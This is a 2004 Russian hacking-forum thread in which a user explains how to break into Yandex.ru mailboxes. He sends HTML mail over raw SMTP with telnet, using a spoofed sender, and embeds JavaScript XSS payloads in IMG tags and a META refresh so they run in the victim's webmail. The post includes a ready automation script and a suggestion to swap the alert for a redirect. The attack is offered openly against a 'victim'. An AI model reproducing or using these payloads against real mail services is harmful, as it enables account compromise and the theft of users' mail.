|
| [ На главную ] -- [ Список участников ] -- [ Правила форума ] -- [ Зарегистрироваться ] |
| On-line: |
| Форум Для Умных Людей / [ ХАКИНГ ] / Взлом Почтового Ящика на Yandex.ru |
| Страницы: 1 |
|
| Автор | Сообщение |
|
Cyberrush Группа: Свой чел Сообщений: 5 
|
Добавлено: 11-10-2004 01:18 |
|
На этот раз нашим орудием станет телнет, надеюсь ты с ним знаком :) Идея такова: мы отсылаем письмо без аттача, с измененным полем Content-Type в сообщении, средствами SMTP протокола. Итак, запускаем telnet, набиваем следующее: open smtp.yandex.ru 25 helo my_enemy mail from: <digitalscream@userline.ru> rcpt to: <i_need_this_mail@yandex.ru> data Вместо i_need_this_mail@yandex.ru пропишешь нужное мыло. А теперь и сама замена типа документа (точку надо ввести при завершении ввода тела документа): Mime-Version: 1.0 Content-Type: TEXT/HTML; charset=US-ASCII Subject: Message Possible virus infected :-) После чего сама мессага сама станет хтмл'ом. А значит можем прописать скрипты. Тут все намного проще и ты можешь вставить в письмо типичные конструкции. Я выбрал: <IMG SRC="javascript:java_script"> Значит продолжаем вводить тело письма: <IMG SRC="javascript:alert('I'm JavaScript!');"> . И наконец: quit Но вместо выскакивающего окна ты можешь накодить редирект. Но так сложилось, что в нашей жизни самое главное автоматизация, ведь нервы сдают после n-ой ошибки. И тем более, если ты сделаешь ошибку в письме своей жертве, то твои шансы падают к нулю. Я советую использовать какие-нибудь программы автоматизации. Я использовал Telnet Script Executor, она старенькая, еще под ДОС, но надежная :) Ее скрипт в данном случае бедет выглядеть так: open smtp.yandex.ru 25 pause 10 transmit "helo my_enemy^M" pause 7 transmit "mail from: <digitalscream@userline.ru>^M" pause 10 transmit "rcpt to: <i_need_this_mail@yandex.ru>^M" pause 7 transmit "data^M" pause 10 transmit "Mime-Version: 1.0^M" pause 2 transmit "Content-Type: TEXT/HTML; charset=US-ASCII^M" pause 2 transmit "Subject: Message Possible virus infected :-)^M" pause 2 transmit "<IMG SRC="javascript:alert('I'm JavaScript!');">^M" pause 2 transmit ".^M" pause 10 close Сохраняем это дело в файл, например yandex_fuck.dat, а потом запускаем: TSE -d<yandex_fuck.dat Но никто не мешает тебе написать свою прогу, мне по крайней мере хватило этой. Вот еще один интересный способ прописать яву, нашел случайно методом научного тыка: <META HTTP-EQUIV="Refresh" content ="4; URL=javascript:alert('hello')"> или тоже самое используя юникод: <META HTTP-EQUIV="Refresh" content ="4;URL=JavaScript:alert('hello')"> The End P.S. Народ говорит что получается...сам ещё не пробовал 
|
|
|
SNIFFER Группа: 1-админ Сообщений: 748 
|
Добавлено: 13-10-2004 13:53 |
я бы проверил но мне ненадо .. а хотя 
|
| Страницы: 1 |
|
| Форум Для Умных Людей / [ ХАКИНГ ] / Взлом Почтового Ящика на Yandex.ru |